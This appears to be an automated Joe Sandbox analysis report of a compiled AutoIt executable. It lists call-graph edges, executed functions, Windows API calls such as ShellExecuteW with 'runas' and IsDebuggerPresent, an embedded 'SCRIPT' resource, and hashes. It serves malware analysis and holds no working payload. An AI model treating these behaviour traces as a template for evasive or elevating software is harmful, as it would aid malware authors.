_memmove 102780->102787 102783 380db6 Mailbox 59 API calls 102781->102783 102782 380db6 Mailbox 59 API calls 102785 367529 102782->102785 102783->102787 102784 367552 102784->102679 102785->102784 102786 380db6 Mailbox 59 API calls 102785->102786 102786->102784 102787->102782 102789 36741e 102788->102789 102790 367370 102788->102790 102789->102679 102791 380db6 Mailbox 59 API calls 102790->102791 102793 3673a2 102790->102793 102791->102793 102792 380db6 59 API calls Mailbox 102792->102793 102793->102789 102793->102792 102794->102664 102795->102679 102796->102679 102797->102679 102798->102673 102800 365c6f CloseHandle 102799->102800 102801 3657dc Mailbox 102800->102801 102802 365c6f CloseHandle 102801->102802 102803 3657eb 102802->102803 102803->102740 102804->102692 102805->102695 102806->102705 102807->102721 102808->102701 102810 367667 59 API calls 102809->102810 102811 3645b1 102810->102811 102812 367667 59 API calls 102811->102812 102813 3645b9 102812->102813 102814 367667 59 API calls 102813->102814 102815 3645c1 102814->102815 102816 367667 59 API calls 102815->102816 102817 3645c9 102816->102817 102818 39d4d2 102817->102818 102819 3645fd 102817->102819 102820 368047 59 API calls 102818->102820 102821 36784b 59 API calls 102819->102821 102822 39d4db 102820->102822 102823 36460b 102821->102823 102824 367d8c 59 API calls 102822->102824 102825 367d2c 59 API calls 102823->102825 102827 364640 102824->102827 102826 364615 102825->102826 102826->102827 102828 36784b 59 API calls 102826->102828 102829 364680 102827->102829 102831 36465f 102827->102831 102842 39d4fb 102827->102842 102832 364636 102828->102832 102830 36784b 59 API calls 102829->102830 102833 364691 102830->102833 102836 3679f2 59 API calls 102831->102836 102835 367d2c 59 API calls 102832->102835 102837 3646a3 102833->102837 102840 368047 59 API calls 102833->102840 102834 39d5cb 102838 367bcc 59 API calls 102834->102838 102835->102827 102839 364669 102836->102839 102841 3646b3 102837->102841 102843 368047 59 API calls 102837->102843 102855 39d588 102838->102855 102839->102829 102846 36784b 59 API calls 102839->102846 102840->102837 102845 3646ba 102841->102845 102847 368047 59 API calls 102841->102847 102842->102834 102844 39d5b4 102842->102844 102854 39d532 102842->102854 102843->102841 102844->102834 102850 39d59f 102844->102850 102848 368047 59 API calls 102845->102848 102857 3646c1 Mailbox 102845->102857 102846->102829 102847->102845 102848->102857 102849 3679f2 59 API calls 102849->102855 102853 367bcc 59 API calls 102850->102853 102851 39d590 102852 367bcc 59 API calls 102851->102852 102852->102855 102853->102855 102854->102851 102858 39d57b 102854->102858 102855->102829 102855->102849 102883 367924 59 API calls 2 library calls 102855->102883 102857->102723 102859 367bcc 59 API calls 102858->102859 102859->102855 102860->102752 102861->102752 102862->102752 102863->102752 102864->102752 102865->102752 102866->102752 102868 365c88 102867->102868 102869 365c79 102867->102869 102868->102869 102870 365c8d CloseHandle 102868->102870 102869->102749 102870->102869 102871->102693 102872->102699 102873->102728 102874->102776 102875->102776 102876->102776 102877->102776 102878->102753 102879->102756 102880->102777 102881->102758 102882->102761 102883->102855 102885 366d95 102884->102885 102886 366ea9 102884->102886 102885->102886 102887 380db6 Mailbox 59 API calls 102885->102887 102886->101848 102889 366dbc 102887->102889 102888 380db6 Mailbox 59 API calls 102894 366e31 102888->102894 102889->102888 102892 36735d 59 API calls 102892->102894 102893 36750f 59 API calls 102893->102894 102894->102886 102894->102892 102894->102893 102897 366240 102894->102897 102922 3b6553 59 API calls Mailbox 102894->102922 102895->101851 102896->101853 102898 367a16 59 API calls 102897->102898 102917 366265 102898->102917 102899 36646a 102900 36750f 59 API calls 102899->102900 102901 366484 Mailbox 102900->102901 102901->102894 102904 39dff6 102927 3bf8aa 92 API calls 4 library calls 102904->102927 102905 36750f 59 API calls 102905->102917 102909 39e004 102911 36750f 59 API calls 102909->102911 102910 367d8c 59 API calls 102910->102917 102912 39e01a 102911->102912 102912->102901 102913 366799 _memmove 102928 3bf8aa 92 API calls 4 library calls 102913->102928 102914 39df92 102915 368029 59 API calls 102914->102915 102916 39df9d 102915->102916 102921 380db6 Mailbox 59 API calls 102916->102921 102917->102899 102917->102904 102917->102905 102917->102910 102917->102913 102917->102914 102919 367e4f 59 API calls 102917->102919 102923 365f6c 60 API calls 102917->102923 102924 365d41 59 API calls Mailbox 102917->102924 102925 365e72 60 API calls 102917->102925 102926 367924 59 API calls 2 library calls 102917->102926 102920 36643b CharUpperBuffW 102919->102920 102920->102917 102921->102913 102922->102894 102923->102917 102924->102917 102925->102917 102926->102917 102927->102909 102928->102901 102929->101866 102930->101867 102932 36e6d5 102931->102932 102933 3a3aa9 102932->102933 102935 36e799 102932->102935 102937 36e73f 102932->102937 102934 369ea0 332 API calls 102933->102934 102936 3a3abe 102934->102936 102938 367667 59 API calls 102935->102938 102942 382d40 __cinit 67 API calls 102935->102942 102944 3a3b26 102935->102944 102946 36e95a 102935->102946 102961 36e970 Mailbox 102935->102961 102936->102961 103004 3c9e4a 90 API calls 4 library calls 102936->103004 102937->102935 102940 367667 59 API calls 102937->102940 102938->102935 102941 3a3b04 102940->102941 102943 382d40 __cinit 67 API calls 102941->102943 102942->102935 102943->102935 102944->101945 102945 3684c0 69 API calls 102945->102961 102946->102961 103005 3c9e4a 90 API calls 4 library calls 102946->103005 102947 369ea0 332 API calls 102947->102961 102949 368d40 59 API calls 102949->102961 102955 3c9e4a 90 API calls 102955->102961 102958 36f195 103009 3c9e4a 90 API calls 4 library calls 102958->103009 102959 3a3e25 102959->101945 102960 36ea78 102960->101945 102961->102945 102961->102947 102961->102949 102961->102955 102961->102958 102961->102960 103003 367f77 59 API calls 2 library calls 102961->103003 103006 3b6e8f 59 API calls 102961->103006 103007 3dc5c3 332 API calls 102961->103007 103008 3db53c 332 API calls Mailbox 102961->103008 103010 369c90 59 API calls Mailbox 102961->103010 103011 3d93c6 332 API calls Mailbox 102961->103011 102963 36f650 102962->102963 102964 36f4ba 102962->102964 102965 367de1 59 API calls 102963->102965 102966 36f4c6 102964->102966 102967 3a441e 102964->102967 102973 36f58c Mailbox 102965->102973 103104 36f290 332 API calls 2 library calls 102966->103104 103106 3dbc6b 332 API calls Mailbox 102967->103106 102970 3a442c 102974 36f630 102970->102974 103107 3c9e4a 90 API calls 4 library calls 102970->103107 102972 36f4fd 102972->102970 102972->102973 102972->102974 102980 364e4a 84 API calls 102973->102980 103012 3ccb7a 102973->103012 103092 3c3c37 102973->103092 103095 3d445a 102973->103095 102974->101945 102976 36f5e3 102976->102974 103105 369c90 59 API calls Mailbox 102976->103105 102980->102976 102981->101945 102982->101945 102983->101945 102984->101874 102985->101879 102986->101945 102987->101884 102988->101884 102989->101884 102990->101945 102991->101945 102992->101945 102993->101945 102994->101945 102995->101945 102996->101930 102997->101930 102998->101930 102999->101930 103000->101930 103001->101930 103002->101930 103003->102961 103004->102961 103005->102961 103006->102961 103007->102961 103008->102961 103009->102959 103010->102961 103011->102961 103013 367667 59 API calls 103012->103013 103014 3ccbaf 103013->103014 103015 367667 59 API calls 103014->103015 103016 3ccbb8 103015->103016 103017 3ccbcc 103016->103017 103217 369b3c 59 API calls 103016->103217 103019 369837 85 API calls 103017->103019 103020 3ccbe9 103019->103020 103021 3cccea 103020->103021 103022 3ccc0b 103020->103022 103033 3ccd1a Mailbox 103020->103033 103023 364ddd 136 API calls 103021->103023 103024 369837 85 API calls 103022->103024 103025 3cccfe 103023->103025 103026 3ccc17 103024->103026 103028 3ccd16 103025->103028 103030 364ddd 136 API calls 103025->103030 103027 368047 59 API calls 103026->103027 103029 3ccc23 103027->103029 103031 367667 59 API calls 103028->103031 103028->103033 103035 3ccc69 103029->103035 103036 3ccc37 103029->103036 103030->103028 103032 3ccd4b 103031->103032 103034 367667 59 API calls 103032->103034 103033->102976 103037 3ccd54 103034->103037 103039 369837 85 API calls 103035->103039 103038 368047 59 API calls 103036->103038 103040 367667 59 API calls 103037->103040 103042 3ccc47 103038->103042 103043 3ccc76 103039->103043 103041 3ccd5d 103040->103041 103044 367667 59 API calls 103041->103044 103045 367cab 59 API calls 103042->103045 103046 368047 59 API calls 103043->103046 103048 3ccd66 103044->103048 103049 3ccc51 103045->103049 103047 3ccc82 103046->103047 103218 3c4a31 GetFileAttributesW 103047->103218 103051 369837 85 API calls 103048->103051 103052 369837 85 API calls 103049->103052 103054 3ccd73 103051->103054 103055 3ccc5d 103052->103055 103053 3ccc8b 103058 3679f2 59 API calls 103053->103058 103061 3ccc9e 103053->103061 103056 36459b 59 API calls 103054->103056 103057 367b2e 59 API calls 103055->103057 103059 3ccd8e 103056->103059 103057->103035 103058->103061 103062 3679f2 59 API calls 103059->103062 103060 369837 85 API calls 103063 3ccccb 103060->103063 103061->103060 103067 3ccca4 103061->103067 103064 3ccd9d 103062->103064 103219 3c37ef 75 API calls Mailbox 103063->103219 103066 3ccdd1 103064->103066 103069 3679f2 59 API calls 103064->103069 103068 368047 59 API calls 103066->103068 103067->103033 103070 3ccddf 103068->103070 103071 3ccdae 103069->103071 103072 367b2e 59 API calls 103070->103072 103071->103066 103074 367bcc 59 API calls 103071->103074 103073 3ccded 103072->103073 103075 367b2e 59 API calls 103073->103075 103076 3ccdc3 103074->103076 103077 3ccdfb 103075->103077 103078 367bcc 59 API calls 103076->103078 103079 367b2e 59 API calls 103077->103079 103078->103066 103080 3cce09 103079->103080 103081 369837 85 API calls 103080->103081 103082 3cce15 103081->103082 103108 3c4071 103082->103108 103084 3cce26 103085 3c3c37 3 API calls 103084->103085 103086 3cce30 103085->103086 103087 369837 85 API calls 103086->103087 103091 3cce61 103086->103091 103088 3cce4e 103087->103088 103162 3c9155 103088->103162 103090 364e4a 84 API calls 103090->103033 103091->103090 103260 3c445a GetFileAttributesW 103092->103260 103096 369837 85 API calls 103095->103096 103097 3d4494 103096->103097 103098 366240 95 API calls 103097->103098 103099 3d44a4 103098->103099 103100 3d44c9 103099->103100 103101 369ea0 332 API calls 103099->103101 103103 3d44cd 103100->103103 103264 369a98 59 API calls Mailbox 103100->103264 103101->103100 103103->102976 103104->102972 103105->102976 103106->102970 103107->102974 103109 3c408d 103108->103109 103110 3c40a0 103109->103110 103111 3c4092 103109->103111 103113 367667 59 API calls 103110->103113 103112 368047 59 API calls 103111->103112 103114 3c409b Mailbox 103112->103114 103115 3c40a8 103113->103115 103114->103084 103116 367667 59 API calls 103115->103116 103117 3c40b0 103116->103117 103118 367667 59 API calls 103117->103118 103119 3c40bb 103118->103119 103120 367667 59 API calls 103119->103120 103121 3c40c3 103120->103121 103122 367667 59 API calls 103121->103122 103123 3c40cb 103122->103123 103124 367667 59 API calls 103123->103124 103125 3c40d3 103124->103125 103126 367667 59 API calls 103125->103126 103127 3c40db 103126->103127 103128 367667 59 API calls 103127->103128 103129 3c40e3 103128->103129 103130 36459b 59 API calls 103129->103130 103131 3c40fa 103130->103131 103132 36459b 59 API calls 103131->103132 103133 3c4113 103132->103133 103134 3679f2 59 API calls 103133->103134 103135 3c411f 103134->103135 103136 3c4132 103135->103136 103137 367d2c 59 API calls 103135->103137 103138 3679f2 59 API calls 103136->103138 103137->103136 103139 3c413b 103138->103139 103140 3c414b 103139->103140 103141 367d2c 59 API calls 103139->103141 103142 368047 59 API calls 103140->103142 103141->103140 103143 3c4157 103142->103143 103144 367b2e 59 API calls 103143->103144 103145 3c4163 103144->103145 103220 3c4223 59 API calls 103145->103220 103147 3c4172 103221 3c4223 59 API calls 103147->103221 103149 3c4185 103163 3c9162 __write_nolock 103162->103163 103164 380db6 Mailbox 59 API calls 103163->103164 103165 3c91bf 103164->103165 103166 36522e 59 API calls 103165->103166 103167 3c91c9 103166->103167 103168 3c8f5f GetSystemTimeAsFileTime 103167->103168 103169 3c91d4 103168->103169 103170 364ee5 85 API calls 103169->103170 103171 3c91e7 _wcscmp 103170->103171 103172 3c92b8 103171->103172 103173 3c920b 103171->103173 103174 3c9734 96 API calls 103172->103174 103175 3c9734 96 API calls 103173->103175 103187 3c9284 _wcscat 103174->103187 103176 3c9210 103175->103176 103180 3c92c1 103176->103180 103239 3840fb 58 API calls __wsplitpath_helper 103176->103239 103178 364f0b 74 API calls 103179 3c92dd 103178->103179 103181 364f0b 74 API calls 103179->103181 103180->103091 103183 3c92ed 103181->103183 103182 3c9239 _wcscat _wcscpy 103240 3840fb 58 API calls __wsplitpath_helper 103182->103240 103184 364f0b 74 API calls 103183->103184 103186 3c9308 103184->103186 103188 364f0b 74 API calls 103186->103188 103187->103178 103187->103180 103189 3c9318 103188->103189 103190 364f0b 74 API calls 103189->103190 103191 3c9333 103190->103191 103192 364f0b 74 API calls 103191->103192 103193 3c9343 103192->103193 103194 364f0b 74 API calls 103193->103194 103195 3c9353 103194->103195 103217->103017 103218->103053 103219->103067 103220->103147 103221->103149 103239->103182 103240->103187 103261 3c3c3e 103260->103261 103262 3c4475 FindFirstFileW 103260->103262 103261->102976 103262->103261 103263 3c448a FindClose 103262->103263 103263->103261 103264->103103

                                                            Executed Functions

                                                            Function 00363B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00363B68
                                                            • IsDebuggerPresent.KERNEL32 ref: 00363B7A
                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,004252F8,004252E0,?,?), ref: 00363BEB
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                              • Part of subcall function 0037092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00363C14,004252F8,?,?,?), ref: 0037096E
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00363C6F
                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00417770,00000010), ref: 0039D281
                                                            • SetCurrentDirectoryW.KERNEL32(?,004252F8,?,?,?), ref: 0039D2B9
                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00414260,004252F8,?,?,?), ref: 0039D33F
                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 0039D346
                                                              • Part of subcall function 00363A46: GetSysColorBrush.USER32(0000000F), ref: 00363A50
                                                              • Part of subcall function 00363A46: LoadCursorW.USER32(00000000,00007F00), ref: 00363A5F
                                                              • Part of subcall function 00363A46: LoadIconW.USER32(00000063), ref: 00363A76
                                                              • Part of subcall function 00363A46: LoadIconW.USER32(000000A4), ref: 00363A88
                                                              • Part of subcall function 00363A46: LoadIconW.USER32(000000A2), ref: 00363A9A
                                                              • Part of subcall function 00363A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00363AC0
                                                              • Part of subcall function 00363A46: RegisterClassExW.USER32(?), ref: 00363B16
                                                              • Part of subcall function 003639D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00363A03
                                                              • Part of subcall function 003639D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00363A24
                                                              • Part of subcall function 003639D5: ShowWindow.USER32(00000000,?,?), ref: 00363A38
                                                              • Part of subcall function 003639D5: ShowWindow.USER32(00000000,?,?), ref: 00363A41
                                                              • Part of subcall function 0036434A: _memset.LIBCMT ref: 00364370
                                                              • Part of subcall function 0036434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00364415
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                            • String ID: This is a third-party compiled AutoIt script.$runas$%?
                                                            • API String ID: 529118366-505933256
                                                            • Opcode ID: 964ed0258bf669d27132c26e2bcea4c9b22323f0dd5e5bca200027297c424831
                                                            • Instruction ID: 84c90862d69b1908313bcc720b2043c86ee5caf731bdb4c51ecfe2706ff1c8f0
                                                            • Opcode Fuzzy Hash: 964ed0258bf669d27132c26e2bcea4c9b22323f0dd5e5bca200027297c424831
                                                            • Instruction Fuzzy Hash: B5510730A08148EECF23EBB4EC46AFD7B78AB45300F90C1A5F451AA1E5CBB45642CB34
                                                            Function 003649A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1037 3649a0-364a00 call 367667 GetVersionExW call 367bcc 1042 364a06 1037->1042 1043 364b0b-364b0d 1037->1043 1044 364a09-364a0e 1042->1044 1045 39d767-39d773 1043->1045 1047 364a14 1044->1047 1048 364b12-364b13 1044->1048 1046 39d774-39d778 1045->1046 1049 39d77b-39d787 1046->1049 1050 39d77a 1046->1050 1051 364a15-364a4c call 367d2c call 367726 1047->1051 1048->1051 1049->1046 1052 39d789-39d78e 1049->1052 1050->1049 1060 364a52-364a53 1051->1060 1061 39d864-39d867 1051->1061 1052->1044 1054 39d794-39d79b 1052->1054 1054->1045 1056 39d79d 1054->1056 1059 39d7a2-39d7a5 1056->1059 1062 39d7ab-39d7c9 1059->1062 1063 364a93-364aaa GetCurrentProcess IsWow64Process 1059->1063 1060->1059 1064 364a59-364a64 1060->1064 1065 39d869 1061->1065 1066 39d880-39d884 1061->1066 1062->1063 1069 39d7cf-39d7d5 1062->1069 1067 364aaf-364ac0 1063->1067 1068 364aac 1063->1068 1070 39d7ea-39d7f0 1064->1070 1071 364a6a-364a6c 1064->1071 1072 39d86c 1065->1072 1073 39d86f-39d878 1066->1073 1074 39d886-39d88f 1066->1074 1076 364ac2-364ad2 call 364b37 1067->1076 1077 364b2b-364b35 GetSystemInfo 1067->1077 1068->1067 1078 39d7df-39d7e5 1069->1078 1079 39d7d7-39d7da 1069->1079 1082 39d7fa-39d800 1070->1082 1083 39d7f2-39d7f5 1070->1083 1080 364a72-364a75 1071->1080 1081 39d805-39d811 1071->1081 1072->1073 1073->1066 1074->1072 1075 39d891-39d894 1074->1075 1075->1073 1094 364ad4-364ae1 call 364b37 1076->1094 1095 364b1f-364b29 GetSystemInfo 1076->1095 1084 364af8-364b08 1077->1084 1078->1063 1079->1063 1088 39d831-39d834 1080->1088 1089 364a7b-364a8a 1080->1089 1085 39d81b-39d821 1081->1085 1086 39d813-39d816 1081->1086 1082->1063 1083->1063 1085->1063 1086->1063 1088->1063 1091 39d83a-39d84f 1088->1091 1092 364a90 1089->1092 1093 39d826-39d82c 1089->1093 1096 39d859-39d85f 1091->1096 1097 39d851-39d854 1091->1097 1092->1063 1093->1063 1102 364ae3-364ae7 GetNativeSystemInfo 1094->1102 1103 364b18-364b1d 1094->1103 1098 364ae9-364aed 1095->1098 1096->1063 1097->1063 1098->1084 1101 364aef-364af2 FreeLibrary 1098->1101 1101->1084 1102->1098 1103->1102
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 003649CD
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                            • GetCurrentProcess.KERNEL32(?,003EFAEC,00000000,00000000,?), ref: 00364A9A
                                                            • IsWow64Process.KERNEL32(00000000), ref: 00364AA1
                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00364AE7
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00364AF2
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00364B23
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00364B2F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                            • String ID:
                                                            • API String ID: 1986165174-0
                                                            • Opcode ID: 0e55340853a1fd778bb37495be33eba950969f65477e9539c70b63723ec7689c
                                                            • Instruction ID: f70a066286bf5b8991631b3e79af4961e3aaf7cfa638d73ce7166b51439a9d26
                                                            • Opcode Fuzzy Hash: 0e55340853a1fd778bb37495be33eba950969f65477e9539c70b63723ec7689c
                                                            • Instruction Fuzzy Hash: BD91C63198D7C4DECB33DBA8C5511AAFFF5AF2A300B448AADD0CB97A45D220E548C759
                                                            Function 00364E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1104 364e89-364ea1 CreateStreamOnHGlobal 1105 364ea3-364eba FindResourceExW 1104->1105 1106 364ec1-364ec6 1104->1106 1107 364ec0 1105->1107 1108 39d933-39d942 LoadResource 1105->1108 1107->1106 1108->1107 1109 39d948-39d956 SizeofResource 1108->1109 1109->1107 1110 39d95c-39d967 LockResource 1109->1110 1110->1107 1111 39d96d-39d98b 1110->1111 1111->1107
                                                            APIs
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00364D8E,?,?,00000000,00000000), ref: 00364E99
                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00364D8E,?,?,00000000,00000000), ref: 00364EB0
                                                            • LoadResource.KERNEL32(?,00000000,?,?,00364D8E,?,?,00000000,00000000,?,?,?,?,?,?,00364E2F), ref: 0039D937
                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00364D8E,?,?,00000000,00000000,?,?,?,?,?,?,00364E2F), ref: 0039D94C
                                                            • LockResource.KERNEL32(00364D8E,?,?,00364D8E,?,?,00000000,00000000,?,?,?,?,?,?,00364E2F,00000000), ref: 0039D95F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: SCRIPT
                                                            • API String ID: 3051347437-3967369404
                                                            • Opcode ID: 5b294fb96a21861bea3ffca30c2a32277d80edf9c0433ad420f7309238a43f3d
                                                            • Instruction ID: 49d91c74f0c587d362949b36e1b0b018ed2ebd59c3986e4b33397a42596ecd6f
                                                            • Opcode Fuzzy Hash: 5b294fb96a21861bea3ffca30c2a32277d80edf9c0433ad420f7309238a43f3d
                                                            • Instruction Fuzzy Hash: 37115175640741BFD7228B65EC48F677BBDFBC6711F108668F5159A190DBA1EC008660
                                                            Function 003C445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,0039E398), ref: 003C446A
                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 003C447B
                                                            • FindClose.KERNEL32(00000000), ref: 003C448B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: e24e9fd7f7d2c90a20565f91a74e2ace94db03e9a983ab80c05e88bd6d497b18
                                                            • Instruction ID: 260b61b3aa551640694d1690b2e11948ab01f506d4f047667f99b47802ec9c9e
                                                            • Opcode Fuzzy Hash: e24e9fd7f7d2c90a20565f91a74e2ace94db03e9a983ab80c05e88bd6d497b18
                                                            • Instruction Fuzzy Hash: BAE0D8378145406B82256B38EC4DAE9775C9F05335F204B19F935C50D0E7B49D009695
                                                            Function 003709D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00370A5B
                                                            • timeGetTime.WINMM ref: 00370D16
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00370E53
                                                            • Sleep.KERNEL32(0000000A), ref: 00370E61
                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 00370EFA
                                                            • DestroyWindow.USER32 ref: 00370F06
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00370F20
                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 003A4E83
                                                            • TranslateMessage.USER32(?), ref: 003A5C60
                                                            • DispatchMessageW.USER32(?), ref: 003A5C6E
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003A5C82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbB$pbB$pbB$pbB
                                                            • API String ID: 4212290369-707248984
                                                            • Opcode ID: 78e6bace5540eb29bf37d8ac3a091953cc6ed8d798dd4f28dcc3f8515af6db84
                                                            • Instruction ID: 4652b29cb5ca71d7e33490bae53b8fbf11b6f7bd20c2cfa66235d067333820af
                                                            • Opcode Fuzzy Hash: 78e6bace5540eb29bf37d8ac3a091953cc6ed8d798dd4f28dcc3f8515af6db84
                                                            • Instruction Fuzzy Hash: 17B2C070608741DFD73ADF24C884BAAB7E4FF86304F15891DE4999B2A1CB75E844CB92
                                                            Function 003C9155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 003C8F5F: __time64.LIBCMT ref: 003C8F69
                                                              • Part of subcall function 00364EE5: _fseek.LIBCMT ref: 00364EFD
                                                            • __wsplitpath.LIBCMT ref: 003C9234
                                                              • Part of subcall function 003840FB: __wsplitpath_helper.LIBCMT ref: 0038413B
                                                            • _wcscpy.LIBCMT ref: 003C9247
                                                            • _wcscat.LIBCMT ref: 003C925A
                                                            • __wsplitpath.LIBCMT ref: 003C927F
                                                            • _wcscat.LIBCMT ref: 003C9295
                                                            • _wcscat.LIBCMT ref: 003C92A8
                                                              • Part of subcall function 003C8FA5: _memmove.LIBCMT ref: 003C8FDE
                                                              • Part of subcall function 003C8FA5: _memmove.LIBCMT ref: 003C8FED
                                                            • _wcscmp.LIBCMT ref: 003C91EF
                                                              • Part of subcall function 003C9734: _wcscmp.LIBCMT ref: 003C9824
